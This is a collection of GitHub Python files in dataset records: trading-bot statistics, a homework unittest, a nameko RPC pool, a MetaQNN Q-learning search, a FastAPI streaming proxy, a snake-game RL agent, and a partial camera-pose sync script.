+ \",\" + str(np.quantile(mustBuyList[:, i], 0.9))\r\n #buyLegend = str(np.quantile(buyList[:, i], 0.1)) + \",\" + str(np.quantile(buyList[:, i], 0.25)) + \",\" + str(np.quantile(buyList[:, i], 0.5)) + \",\" + str(np.quantile(buyList[:, i], 0.75)) + \",\" + str(np.quantile(buyList[:, i], 0.9))\r\n buyLegend = str(np.quantile(buyList[:, i], 0.1)) + \",\" + str(np.quantile(buyList[:, i], 0.9))\r\n\r\n if len(badList) > 0:\r\n badLegend = str(np.quantile(badList[:, i], 0.1)) + \",\" + str(np.quantile(badList[:, i], 0.25)) + \",\" + str(np.quantile(badList[:, i], 0.5)) + \",\" + str(np.quantile(badList[:, i], 0.75)) + \",\" + str(np.quantile(badList[:, i], 0.9))\r\n else:\r\n badLegend = \"empty\"\r\n #print(str(self.transactionParam.msec) ,\"_\" , str(i), \"_\" , buyLegend , \" \", badLegend)\r\n print(str(self.transactionParam.msec) ,\"_\" , str(i), \"_\" , buyLegend )\r\n\r\n #plt.savefig('Plots/' + str(self.transactionParam.msec) + \"_\" + str(i) + \"_box.pdf\")\r\n #plt.cla()\r\n #plt.clf()\r\n print(\"Good count: \", len(self.patternList))\r\n #plt.close()\r\n\r\n\r\n def __MergeInTransactions(self, handler):\r\n for pattern in handler.patternList:\r\n self.patternList.append(pattern.GetFeatures() + handler.GetFeatures())\r\n\r\n for pattern in handler.mustBuyList:\r\n self.mustBuyList.append(pattern.GetFeatures() + handler.GetFeatures())\r\n\r\n for pattern in handler.badPatternList:\r\n self.badPatternList.append(pattern.GetFeatures() + handler.GetFeatures())\r\n\r\n for pattern in handler.mustSellList:\r\n self.mustSellList.append(pattern.GetFeatures() )\r\n\r\n for pattern in handler.keepList:\r\n self.keepList.append(pattern.GetFeatures())\r\n\r\n\r\nclass SuddenChangeManager:\r\n\r\n def __init__(self, transactionParamList):\r\n self.marketState = MarketStateManager.MarketStateManager()\r\n #self.FeedMarketState()\r\n\r\n self.transParamList = transactionParamList\r\n self.suddenChangeMergerList = []\r\n self.CreateSuddenChangeMergers()\r\n print(self.suddenChangeMergerList)\r\n self.FeedChangeMergers()\r\n self.FinalizeMergers()\r\n badListArray = np.array(SuddenChangeHandler.fallTotalPower)\r\n goodListArray = np.array(SuddenChangeHandler.riseTotalPower)\r\n badLegend = str(np.quantile(badListArray, 0.1)) + \", \" + str(np.quantile(badListArray, 0.25)) + \" , ** \" \\\r\n + str(np.quantile(badListArray, 0.5)) + \" ** ,\" + str(np.quantile(badListArray, 0.75)) + \" , \" + str(\r\n np.quantile(badListArray, 0.9))\r\n goodLegend = str(np.quantile(goodListArray, 0.1)) + \" , \" + str(np.quantile(goodListArray, 0.25)) + \\\r\n \" , ** \" + str(np.quantile(goodListArray, 0.5)) + \" ** , \" + str(np.quantile(goodListArray, 0.75)) + \" , \" + str(\r\n np.quantile(goodListArray, 0.9))\r\n print(\" Good results \", goodLegend)\r\n print(\" Bad results \", badLegend)\r\n\r\n def FeedMarketState(self):\r\n jumpDataFolderPath = os.path.abspath(os.getcwd()) + \"/Data/JumpData/\"\r\n onlyJumpFiles = [f for f in listdir(jumpDataFolderPath) if isfile(join(jumpDataFolderPath, f))]\r\n riseCount = 0\r\n downCount = 0\r\n for fileName in onlyJumpFiles:\r\n print(\"Reading market state\", jumpDataFolderPath + fileName, \" \")\r\n file = open(jumpDataFolderPath + fileName, \"r\")\r\n epoch = datetime.utcfromtimestamp(0)\r\n try:\r\n jsonDictionary = json.load(file)\r\n for jsonIn in jsonDictionary:\r\n if not jsonIn:\r\n continue\r\n\r\n tempTransaction = json.loads(jsonIn[\"transactions\"])\r\n if len(tempTransaction) == 0:\r\n continue\r\n timeStr = jsonIn[\"reportTime\"]\r\n datetime_object = datetime.strptime(timeStr.split(\".\")[0], '%Y-%b-%d %H:%M:%S')\r\n reportTimeInSeconds = (datetime_object - epoch).total_seconds()\r\n\r\n lastTimeInSeconds = int(tempTransaction[-1][\"T\"]) // 1000\r\n if reportTimeInSeconds - lastTimeInSeconds > 1500:\r\n reportTimeInSeconds -= 3600\r\n isRise = bool(jsonIn[\"isRise\"])\r\n if isRise:\r\n riseCount += 1\r\n else:\r\n downCount += 1\r\n self.marketState.add(isRise, reportTimeInSeconds)\r\n except Exception as e:\r\n print(\"There was a exception in \", fileName, e)\r\n if IsOneFileOnly:\r\n break\r\n self.marketState.sort()\r\n print(\"Total rise: \", riseCount, \" total down: \", downCount)\r\n\r\n def FeedChangeMergers(self):\r\n jumpDataFolderPath = os.path.abspath(os.getcwd()) + \"/Data/JumpData/\"\r\n onlyJumpFiles = [f for f in listdir(jumpDataFolderPath) if isfile(join(jumpDataFolderPath, f))]\r\n for fileName in onlyJumpFiles:\r\n print(\"Reading Jump\", jumpDataFolderPath + fileName, \" \")\r\n file = open(jumpDataFolderPath + fileName, \"r\")\r\n #try:\r\n jsonDictionary = json.load(file)\r\n for merger in self.suddenChangeMergerList:\r\n merger.AddFile(jsonDictionary)\r\n #except Exception as e:\r\n # print(\"There was a exception in \", fileName, e )\r\n if IsOneFileOnly:\r\n break\r\n\r\n def toTransactionFeaturesNumpy(self, index):\r\n return self.suddenChangeMergerList[index].toTransactionFeaturesNumpy()\r\n\r\n def toTransactionResultsNumpy(self, index):\r\n return self.suddenChangeMergerList[index].toTransactionResultsNumpy()\r\n\r\n def toSellTransactions(self, index):\r\n return self.suddenChangeMergerList[index].toSellTransactions()\r\n\r\n def toSellResultsNumpy(self, index):\r\n return self.suddenChangeMergerList[index].toSellResultsNumpy()\r\n\r\n def FinalizeMergers(self):\r\n for transactionIndex in range(len(self.transParamList)):\r\n self.suddenChangeMergerList[transactionIndex].Finalize()\r\n\r\n def CreateSuddenChangeMergers(self):\r\n for transactionIndex in range(len(self.transParamList)):\r\n newMerger = SuddenChangeMerger(self.transParamList[transactionIndex], self.marketState)\r\n self.suddenChangeMergerList.append(newMerger)","repo_name":"kerdemdemir/SnakeBot","sub_path":"SuddenChangeTransactions.py","file_name":"SuddenChangeTransactions.py","file_ext":"py","file_size_in_byte":25777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19149140954","text":"from homework3 import create_dataframe \nimport unittest \n\n\nclass TestHomework3(unittest.TestCase):\n # test whether the dataframe returned contains the right column names\n def test_column_names(self):\n inputdf = create_dataframe('./class.db')\n inputdfColumns, testColumns = list(inputdf.columns), ['video_id', 'category_id', 'language']\n checkColumnInd = not bool(set(inputdfColumns).difference(set(testColumns))) \n self.assertTrue(checkColumnInd)\n\n # test whether the dataframe returned contains the right number of rows\n def test_table_rows(self):\n inputdf = create_dataframe('./class.db')\n self.assertTrue(inputdf.shape[0] == 75005)\n \n # test whether the columns ['video_id', 'category_id' and 'language'] is a key\n def test_key_columns(self):\n inputdf = create_dataframe('./class.db')\n rows = inputdf.shape[0]\n uniqueValuesOfColumns = inputdf.groupby(['video_id', 'category_id', 'language']).size().shape[0]\n self.assertTrue(rows == uniqueValuesOfColumns)\n \n # test whether the correct exception is generated when an invalid path is provided.\n def test_exception_type(self):\n \twith self.assertRaises(ValueError):\n create_dataframe('wrongDatabasePath')\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"uwseds-sp18/homework-3-jasonfeiwang","sub_path":"test_homework3.py","file_name":"test_homework3.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39947596873","text":"\"\"\"\nsource reference: https://github.com/nameko/nameko/pull/357\n\"\"\"\nimport weakref\nimport os\n\nfrom six.moves import xrange as xrange_six, queue as queue_six\nfrom nameko.standalone.rpc import ClusterRpcClient\nfrom nameko import config\nfrom nameko.cli.utils.config import setup_config\n\nclass ClusterRpcProxyPool(object):\n \"\"\" Connection pool for Nameko RPC cluster.\n Pool size can be customized by passing `pool_size` kwarg to constructor.\n Default size is 2 per uvicorn worker (should be enough)\n *Usage*\n pool = ClusterRpcProxyPool(config)\n pool.start()\n # ...\n with pool.next() as rpc:\n rpc.mailer.send_mail(foo='bar')\n # ...\n pool.stop()\n This class is thread-safe and designed to work with GEvent.\n \"\"\"\n class RpcContext(object):\n def __init__(self, pool, uri, timeout):\n self.pool = weakref.proxy(pool)\n self.proxy = ClusterRpcClient(uri=uri, timeout=timeout)\n self.rpc = self.proxy.start()\n\n def stop(self):\n self.proxy.stop()\n self.proxy = None\n self.rpc = None\n\n def __enter__(self):\n return self.rpc\n\n def __exit__(self, *args, **kwargs):\n try:\n self.pool._put_back(self)\n except ReferenceError: # pragma: no cover\n # We're detached from the parent, so this context\n # is going to silently die.\n self.stop()\n\n def __init__(self, uri, timeout=None, pool_size=2):\n self.uri = uri\n self.timeout = timeout\n self.pool_size = pool_size\n\n def start(self):\n \"\"\" Populate pool with connections.\n \"\"\"\n self.queue = queue_six.Queue()\n for i in xrange_six(self.pool_size):\n ctx = ClusterRpcProxyPool.RpcContext(self, self.uri, self.timeout)\n self.queue.put(ctx)\n\n def next(self, timeout=None):\n \"\"\" Fetch next connection.\n This method is thread-safe.\n \"\"\"\n return self.queue.get(timeout=timeout)\n\n def _put_back(self, ctx):\n self.queue.put(ctx)\n\n def stop(self):\n \"\"\" Stop queue and remove all connections from pool.\n \"\"\"\n while True:\n try:\n ctx = self.queue.get_nowait()\n ctx.stop()\n except queue_six.Empty:\n break\n self.queue.queue.clear()\n self.queue = None\n\n# Global/Module pool\nif os.path.exists('config.yml'):\n with open('config.yml', 'r') as config_file:\n setup_config(config_file)\nelse:\n raise Exception(\"config.yml configuration file not found\")\n\nNAMEKO_POOL = ClusterRpcProxyPool(\n uri=config['AMQP_URI'],\n timeout=None\n)\nNAMEKO_POOL.start()\n\ndef destroy_nameko_pool():\n NAMEKO_POOL.stop()\n\ndef get_rpc():\n yield NAMEKO_POOL\n\nconfig = config","repo_name":"gitricko/nameko-devex","sub_path":"gateapi/gateapi/api/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42707292084","text":"import os\nimport time\nimport numpy as np\nimport pandas as pd\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom lib.MetaQNN.cnn import parse as cnn_parse\nimport state_enumerator as se\nfrom state_string_utils import StateStringUtils\nfrom lib.Models.network import net\nfrom lib.Training.train import train\nfrom lib.Training.validate import validate\nfrom lib.Training.learning_rate_scheduling import LearningRateScheduler\nfrom lib.Utility.pytorch_modelsize import SizeEstimator\nfrom lib.Utility.utils import GPUMem\n\nclass QValues:\n def __init__(self):\n self.q = {}\n\n def save_to_csv(self, q_csv_path):\n start_layer_type = []\n start_layer_depth = []\n start_filter_depth = []\n start_filter_size = []\n start_stride = []\n start_image_size = []\n start_fc_size = []\n start_terminate = []\n end_layer_type = []\n end_layer_depth = []\n end_filter_depth = []\n end_filter_size = []\n end_stride = []\n end_image_size = []\n end_fc_size = []\n end_terminate = []\n utility = []\n for start_state_list in self.q.keys():\n start_state = se.State(state_list=start_state_list)\n for to_state_ix in range(len(self.q[start_state_list]['actions'])):\n to_state = se.State(state_list=self.q[start_state_list]['actions'][to_state_ix])\n utility.append(self.q[start_state_list]['utilities'][to_state_ix])\n start_layer_type.append(start_state.layer_type)\n start_layer_depth.append(start_state.layer_depth)\n start_filter_depth.append(start_state.filter_depth)\n start_filter_size.append(start_state.filter_size)\n start_stride.append(start_state.stride)\n start_image_size.append(start_state.image_size)\n start_fc_size.append(start_state.fc_size)\n start_terminate.append(start_state.terminate)\n end_layer_type.append(to_state.layer_type)\n end_layer_depth.append(to_state.layer_depth)\n end_filter_depth.append(to_state.filter_depth)\n end_filter_size.append(to_state.filter_size)\n end_stride.append(to_state.stride)\n end_image_size.append(to_state.image_size)\n end_fc_size.append(to_state.fc_size)\n end_terminate.append(to_state.terminate)\n\n q_csv = pd.DataFrame({'start_layer_type': start_layer_type,\n 'start_layer_depth': start_layer_depth,\n 'start_filter_depth': start_filter_depth,\n 'start_filter_size': start_filter_size,\n 'start_stride': start_stride,\n 'start_image_size': start_image_size,\n 'start_fc_size': start_fc_size,\n 'start_terminate': start_terminate,\n 'end_layer_type': end_layer_type,\n 'end_layer_depth': end_layer_depth,\n 'end_filter_depth': end_filter_depth,\n 'end_filter_size': end_filter_size,\n 'end_stride': end_stride,\n 'end_image_size': end_image_size,\n 'end_fc_size': end_fc_size,\n 'end_terminate': end_terminate,\n 'utility': utility})\n q_csv.to_csv(q_csv_path, index=False)\n\n def load_q_values(self, q_csv_path):\n self.q = {}\n q_csv = pd.read_csv(q_csv_path)\n for row in zip(*[q_csv[col].values.tolist() for col in ['start_layer_type',\n 'start_layer_depth',\n 'start_filter_depth',\n 'start_filter_size',\n 'start_stride',\n 'start_image_size',\n 'start_fc_size',\n 'start_terminate',\n 'end_layer_type',\n 'end_layer_depth',\n 'end_filter_depth',\n 'end_filter_size',\n 'end_stride',\n 'end_image_size',\n 'end_fc_size',\n 'end_terminate',\n 'utility']]):\n start_state = se.State(layer_type = row[0],\n layer_depth = row[1],\n filter_depth = row[2],\n filter_size = row[3],\n stride = row[4],\n image_size = row[5],\n fc_size = row[6],\n terminate = row[7]).as_tuple()\n end_state = se.State(layer_type = row[8],\n layer_depth = row[9],\n filter_depth = row[10],\n filter_size = row[11],\n stride = row[12],\n image_size = row[13],\n fc_size = row[14],\n terminate = row[15]).as_tuple()\n utility = row[16]\n\n if start_state not in self.q:\n self.q[start_state] = {'actions': [end_state], 'utilities': [utility]}\n else:\n self.q[start_state]['actions'].append(end_state)\n self.q[start_state]['utilities'].append(utility)\n\nclass QLearner:\n def __init__(self,\n state_space_parameters, \n epsilon,\n WeightInitializer=None,\n device=None,\n args=None,\n save_path=None,\n state=None,\n qstore=None,\n replaydict = None,\n replay_dictionary = pd.DataFrame(columns=['net',\n 'spp_size',\n 'reward',\n 'epsilon',\n 'train_flag'])):\n self.state_list = []\n self.state_space_parameters = state_space_parameters\n self.args = args\n self.enum = se.StateEnumerator(state_space_parameters, args)\n self.stringutils = StateStringUtils(state_space_parameters, args)\n self.state = se.State('start', 0, 1, 0, 0, args.patch_size, 0, 0) if not state else state\n self.qstore = QValues() \n if type(qstore) is not type(None):\n self.qstore.load_q_values(qstore)\n self.replay_dictionary = pd.read_csv(replaydict, index_col=0)\n else:\n self.replay_dictionary = replay_dictionary\n self.epsilon = epsilon\n self.WeightInitializer = WeightInitializer\n self.device = device\n self.gpu_mem_0 = GPUMem(torch.device('cuda') == self.device)\n self.save_path = save_path\n # TODO: hard-coded arc no. to resume from if epsilon < 1\n self.count = args.continue_ite - 1 #137 (hard-coded no. for epsilon < 1)\n\n def generate_net(self, epsilon=None, dataset=None):\n if epsilon != None:\n self.epsilon = epsilon\n self.__reset_for_new_walk()\n state_list = self.__run_agent()\n\n net_string = self.stringutils.state_list_to_string(state_list, num_classes=len(dataset.val_loader.dataset.class_to_idx))\n\n train_flag = True\n if net_string in self.replay_dictionary['net'].values:\n spp_size = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['spp_size'].values[0]\n hard_best_val = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['reward'].values[0]\n train_flag = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['train_flag'].values[0]\n\n self.replay_dictionary = self.replay_dictionary.append(pd.DataFrame([[net_string, spp_size, hard_best_val,\n self.epsilon, train_flag]],\n columns=['net', \n 'spp_size',\n 'reward',\n 'epsilon',\n 'train_flag']),\n ignore_index=True)\n self.count += 1\n self.replay_dictionary.to_csv(os.path.join(self.save_path,'replayDict' + str(self.count) + '.csv'))\n self.sample_replay_for_update()\n self.qstore.save_to_csv(os.path.join(self.save_path,'qVal' + str(self.count) + '.csv'))\n else:\n spp_size, hard_best_val, train_flag = self.__train_val_net(state_list, self.state_space_parameters, dataset)\n flag_net_string_present = False\n while spp_size is None:\n print('=' * 80)\n print(\"arc failed mem check..sampling again!\")\n print('=' * 80)\n self.__reset_for_new_walk()\n state_list = self.__run_agent()\n net_string = self.stringutils.state_list_to_string(state_list, num_classes=len(dataset.val_loader.dataset.class_to_idx))\n if net_string in self.replay_dictionary['net'].values:\n spp_size = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['spp_size'].values[0]\n hard_best_val = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['reward'].values[0]\n train_flag = self.replay_dictionary[self.replay_dictionary['net'] == net_string]['train_flag'].values[0]\n\n self.replay_dictionary = self.replay_dictionary.append(pd.DataFrame([[net_string, spp_size, hard_best_val,\n self.epsilon, train_flag]],\n columns=['net', \n 'spp_size',\n 'reward',\n 'epsilon']),\n ignore_index=True)\n self.count += 1\n self.replay_dictionary.to_csv(os.path.join(self.save_path,'replayDict' + str(self.count) + '.csv'))\n self.sample_replay_for_update()\n self.qstore.save_to_csv(os.path.join(self.save_path,'qVal' + str(self.count) + '.csv'))\n flag_net_string_present = True\n break\n spp_size, hard_best_val, train_flag = \\\n self.__train_val_net(state_list, self.state_space_parameters, dataset)\n \n if flag_net_string_present == False:\n\n self.replay_dictionary = self.replay_dictionary.append(pd.DataFrame([[net_string, spp_size, hard_best_val,\n self.epsilon, train_flag]],\n columns=['net', \n 'spp_size',\n 'reward',\n 'epsilon',\n 'train_flag']),\n ignore_index=True)\n self.count += 1\n self.replay_dictionary.to_csv(os.path.join(self.save_path,'replayDict' + str(self.count) + '.csv'))\n self.sample_replay_for_update()\n self.qstore.save_to_csv(os.path.join(self.save_path,'qVal' + str(self.count) + '.csv'))\n\n # if train_flag == True:\n print('Reward:{}'.format(hard_best_val))\n\n def __train_val_net(self, state_list, state_space_parameters, dataset):\n best_prec = 0.\n num_classes = len(dataset.val_loader.dataset.class_to_idx)\n net_input, _ = next(iter(dataset.val_loader))\n\n model = net(state_list, state_space_parameters, num_classes, net_input, self.args.batch_norm, self.args.drop_out_drop)\n\n print(model)\n print('-' * 80)\n print('SPP levels: {}'.format(model.spp_filter_size))\n print('-' * 80)\n print ('Estimated total gpu usage of model: {gpu_usage:.4f} GB'.format(gpu_usage = model.gpu_usage))\n model_activations_gpu = model.gpu_usage\n cudnn.benchmark = True\n self.WeightInitializer.init_model(model)\n model = model.to(self.device)\n print('available:{}'.format((self.gpu_mem_0.total_mem - self.gpu_mem_0.total_mem*self.gpu_mem_0.get_mem_util())/1024.))\n print('required per gpu with buffer: {}'.format((3./float(self.args.no_gpus)*model_activations_gpu) + 1))\n print('-' * 80)\n if ((self.gpu_mem_0.total_mem - self.gpu_mem_0.total_mem*self.gpu_mem_0.get_mem_util())/1024.) < ((3./float(self.args.no_gpus)*model_activations_gpu) + 1): \n del model\n return [None] * 12\n if int(self.args.no_gpus)>1:\n model = torch.nn.DataParallel(model)\n criterion = nn.BCELoss(size_average = True).to(self.device)\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, model.parameters()),\n lr=self.args.learning_rate,\n momentum=self.args.momentum, weight_decay=self.args.weight_decay)\n lr_scheduler = LearningRateScheduler(self.args.lr_wr_epochs, len(dataset.train_loader.dataset), self.args.batch_size,\n self.args.learning_rate, self.args.lr_wr_mul, self.args.lr_wr_min)\n\n train_flag = True\n epoch = 0\n while epoch < self.args.epochs:\n train(dataset, model, criterion, epoch, optimizer, lr_scheduler, self.device, self.args)\n prec = validate(dataset, model, criterion, epoch, self.device, self.args)\n best_prec = max(prec, best_prec)\n # TODO: hard-coded early stopping criterion of last prec < 15%\n if epoch==(self.args.lr_wr_epochs - 1) and float(prec)<(1.5 *100./10):\n train_flag = False\n break\n epoch += 1\n if self.args.no_gpus>1:\n spp_filter_size = model.module.spp_filter_size\n else:\n spp_filter_size = model.spp_filter_size\n del model, criterion, optimizer, lr_scheduler\n return spp_filter_size, best_prec, train_flag\n\n def __reset_for_new_walk(self):\n\n self.state_list = []\n self.state = se.State('start', 0, 1, 0, 0, self.args.patch_size, 0, 0)\n\n def __run_agent(self):\n\n while self.state.terminate == 0:\n self.__transition_q_learning()\n\n return self.state_list\n\n def __transition_q_learning(self):\n if self.state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(self.state, self.qstore.q) \n action_values = self.qstore.q[self.state.as_tuple()]\n if np.random.random() < self.epsilon:\n action = se.State(state_list=action_values['actions'][np.random.randint(len(action_values['actions']))])\n else:\n max_q_value = max(action_values['utilities'])\n max_q_indexes = [i for i in range(len(action_values['actions'])) if action_values['utilities'][i] == max_q_value]\n max_actions = [action_values['actions'][i] for i in max_q_indexes]\n action = se.State(state_list=max_actions[np.random.randint(len(max_actions))])\n\n self.state = self.enum.state_action_transition(self.state, action)\n self.__post_transition_updates()\n\n def __post_transition_updates(self):\n non_bucketed_state = self.state.copy()\n self.state_list.append(non_bucketed_state)\n\n def sample_replay_for_update(self):\n net = self.replay_dictionary.iloc[-1]['net']\n reward_best_val = self.replay_dictionary.iloc[-1]['reward']\n train_flag = self.replay_dictionary.iloc[-1]['train_flag']\n state_list = self.stringutils.convert_model_string_to_states(cnn_parse('net', net))\n # if train_flag:\n self.__update_q_value_sequence(state_list, self.__accuracy_to_reward(reward_best_val/100.))\n\n for i in range(self.state_space_parameters.replay_number-1):\n net = np.random.choice(self.replay_dictionary['net'])\n reward_best_val = self.replay_dictionary[self.replay_dictionary['net'] == net]['reward'].values[0]\n train_flag = self.replay_dictionary[self.replay_dictionary['net'] == net]['train_flag'].values[0]\n state_list = self.stringutils.convert_model_string_to_states(cnn_parse('net', net))\n # if train_flag == True:\n self.__update_q_value_sequence(state_list, self.__accuracy_to_reward(reward_best_val/100.)) \n\n def __accuracy_to_reward(self, acc):\n return acc\n\n def __update_q_value_sequence(self, states, termination_reward):\n self.__update_q_value(states[-2], states[-1], termination_reward)\n for i in reversed(range(len(states) - 2)):\n \n # TODO: q-learning update (set proper q-learning rate in cmdparser.py)\n self.__update_q_value(states[i], states[i+1], 0)\n\n # TODO: modified update for shorter search schedules (doesn't use q-learning rate in computation)\n # self.__update_q_value(states[i], states[i+1], termination_reward)\n\n def __update_q_value(self, start_state, to_state, reward):\n if start_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(start_state, self.qstore.q)\n if to_state.as_tuple() not in self.qstore.q:\n self.enum.enumerate_state(to_state, self.qstore.q)\n\n actions = self.qstore.q[start_state.as_tuple()]['actions']\n values = self.qstore.q[start_state.as_tuple()]['utilities']\n\n max_over_next_states = max(self.qstore.q[to_state.as_tuple()]['utilities']) if to_state.terminate != 1 else 0\n action_between_states = self.enum.transition_to_action(start_state, to_state).as_tuple()\n\n # TODO: q-learning update (set proper q-learning rate in cmdparser.py)\n values[actions.index(action_between_states)] = values[actions.index(action_between_states)] + \\\n self.args.q_learning_rate * \\\n (reward + self.args.q_discount_factor *\n max_over_next_states -\n values[actions.index(action_between_states)])\n\n # TODO: modified update for shorter search schedules (doesn't use q-learning rate in computation)\n # values[actions.index(action_between_states)] = values[actions.index(action_between_states)] + \\\n # (max(reward, values[actions.index(action_between_states)]) -\n # values[actions.index(action_between_states)])\n\n self.qstore.q[start_state.as_tuple()] = {'actions': actions, 'utilities': values}\n","repo_name":"SAGNIKMJR/MetaQNN_ImageClassification_PyTorch","sub_path":"lib/MetaQNN/q_learner.py","file_name":"q_learner.py","file_ext":"py","file_size_in_byte":20611,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"28342821269","text":"from fastapi import APIRouter, Header\nfrom ..models.stream import Proxy\n\nroutes = APIRouter()\n\n@routes.get(\"/proxy\")\nasync def main(token: str, Range: str = Header(None)):\n range_header = Range\n \n if range_header is None:\n range_header = \"bytes=0-\"\n \n proxy = Proxy(token, range_header)\n return await proxy.stream()\n\n# @routes.get(\"/teste/hentais\")\n# async def teste_hentais():\n# a = AssistirHentais(\"https://www.assistirhentai.com/episodio/isekai-kita-node-sukebe-skill-de-zenryoku-ouka-shiyou-to-omou-episodio-01/\")\n# return a.get_video_link_from_iframe()","repo_name":"Animarubr/video_proxy","sub_path":"app/routes/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72876906811","text":"import torch\nimport random\nimport numpy as np\nfrom collections import deque\nfrom snakegame import SnakeGameAI, Direction, Point\nfrom model import Linear_QNet, QTrainer\nfrom helper import plot\n\nMAX_MEMORY = 100_000\nBATCH_SIZE = 1000\nLR = 0.001\n\nclass Agent:\n \n def __init__(self):\n self.n_games = 0\n self.epsilon = 0 # control the randomness of the agent\n self.gamma = 0.9 # discount rate\n self.memory = deque(maxlen=MAX_MEMORY) # If we exed the memory, it will automatically train remove element from the left -> popleft()\n self.model = Linear_QNet(11, 256, 3)\n self.trainer = QTrainer(self.model, lr=LR, gamma=self.gamma)\n \n \n def get_state(self, snakegame):\n head = snakegame.snake[0]\n \n #Create 4 point arround the head - 20 is for the bloc size on snakegame.py\n point_l = Point(head.x -20, head.y)\n point_r = Point(head.x +20, head.y)\n point_u = Point(head.x, head.y -20)\n point_d = Point(head.x, head.y +20)\n \n # Boolean to know if the point is in the snake -> only one set to TRUE=1 other to FALSE=0\n dir_l = snakegame.direction == Direction.LEFT\n dir_r = snakegame.direction == Direction.RIGHT\n dir_u = snakegame.direction == Direction.UP\n dir_d = snakegame.direction == Direction.DOWN\n \n state = [\n #Dange straigh ahead\n (dir_r and snakegame.is_collision(point_r)) or \n (dir_l and snakegame.is_collision(point_l)) or \n (dir_u and snakegame.is_collision(point_u)) or\n (dir_d and snakegame.is_collision(point_d)),\n \n #Danger on the right\n (dir_d and snakegame.is_collision(point_r)) or\n (dir_u and snakegame.is_collision(point_l)) or\n (dir_r and snakegame.is_collision(point_u)) or\n (dir_l and snakegame.is_collision(point_d)),\n \n #Danger on the left\n (dir_d and snakegame.is_collision(point_r)) or\n (dir_u and snakegame.is_collision(point_l)) or\n (dir_r and snakegame.is_collision(point_u)) or\n (dir_l and snakegame.is_collision(point_d)),\n \n #Move direction\n dir_l,\n dir_r,\n dir_u,\n dir_d,\n \n #Food location\n snakegame.food.x < snakegame.head.x, #food on the left\n snakegame.food.x > snakegame.head.x, #food on the right\n snakegame.food.y < snakegame.head.y, #food on the top\n snakegame.food.y > snakegame.head.y #food on the bottom\n ]\n \n return np.array(state, dtype=int)\n \n \n def remember(self, state, action, reward, next_state, done):\n # If it exced the maxumum memory, it will remove the oldest element -> popleft()\n self.memory.append((state, action, reward, next_state, done))\n \n def train_long_memory(self):\n if len(self.memory) > BATCH_SIZE:\n # Return a list of tuples (a finite ordered list (sequence) of elements.)\n mini_sample = random.sample(self.memory, BATCH_SIZE)\n else:\n mini_sample = self.memory\n \n states, actions, rewards, next_states, dones = zip(*mini_sample)\n self.trainer.train_step(states, actions, rewards, next_states, dones)\n \n def train_short_memory(self, state, action, reward, next_state, done):\n self.trainer.train_step(state, action, reward, next_state, done)\n \n def get_action(self, state):\n # Random action : tradeoff between randomness and exploitation\n self.epsilon = 80 - self.n_games # More game played = smaller epsilon (epsilon = how many games played)\n final_move = [0,0,0]\n if random.randint(0, 200) < self.epsilon: #\n move = random.randint(0, 2)\n final_move[move] = 1\n else:\n state0 = torch.tensor(state, dtype=torch.float)\n prediction = self.model(state0)\n move = torch.argmax(prediction).item()\n final_move[move] = 1\n \n return final_move\n \ndef train():\n plot_scores = []\n plot_mean_scores = []\n total_score = 0\n record = 0\n agent = Agent()\n snakegame = SnakeGameAI()\n while True:\n # get the old state of the current state\n state_old = agent.get_state(snakegame)\n \n #Get moove of the final state\n final_move = agent.get_action(state_old)\n \n # perform move and get new state\n reward, done, score = snakegame.play_step(final_move)\n state_new = agent.get_state(snakegame)\n \n # Train short memory\n agent.train_short_memory(state_old, final_move, reward, state_new, done)\n \n # Remember the old state, action, reward, new state, done\n agent.remember(state_old, final_move, reward, state_new, done)\n \n if done:\n # train long memory + plot the result\n snakegame.reset()\n agent.n_games += 1\n agent.train_long_memory()\n \n if score > record:\n record = score\n agent.model.save()\n \n print('game', agent.n_games, 'score', score, 'record', record)\n \n plot_scores.append(score)\n total_score += score\n mean_score = total_score / agent.n_games\n plot_mean_scores.append(mean_score)\n plot(plot_scores, plot_mean_scores)\n \nif __name__ == '__main__':\n train()","repo_name":"IMPWNG/SnakeGame_AI","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"167271559","text":"import os\nimport argparse\n\n\ndef sync_intrinsics_and_poses(cam_file, pose_file, out_file):\n \"\"\"Load camera intrinsics\"\"\"\n assert os.path.isfile(cam_file), \"camera info:{} not found\".format(cam_file)\n with open(cam_file, \"r\") as f:\n cam_intrinsic_lines = f.readlines()\n \n cam_intrinsics = []\n for line in cam_intrinsic_lines:\n line_data_list = line.split(',')\n if len(line_data_list) == 0:\n continue\n cam_intrinsics.append([float(i) for i in line_data_list])\n\n \"\"\"load camera poses\"\"\"\n assert os.path.isfile(pose_file), \"camera info:{} not found\".format(pose_file)\n with open(pose_file, \"r\") as f:\n cam_pose_lines = f.readlines()\n\n cam_poses = []\n for line in cam_pose_lines:\n line_data_list = line.split(',')\n if len(line_data_list) == 0:\n continue\n cam_poses.append([float(i) for i in line_data_list])\n\n \n lines = []\n ip = 0\n length = len(cam_poses)\n for i in range(len(cam_intrinsics)):\n while ip + 1< length and abs(cam_poses[ip + 1][0] - cam_intrinsics[i][0]) < abs(cam_poses[ip][0] - cam_intrinsics[i][0]):\n ip += 1\n cam_pose = cam_poses[ip][:4] + cam_poses[ip][5:] + [cam_poses[ip][4]]\n 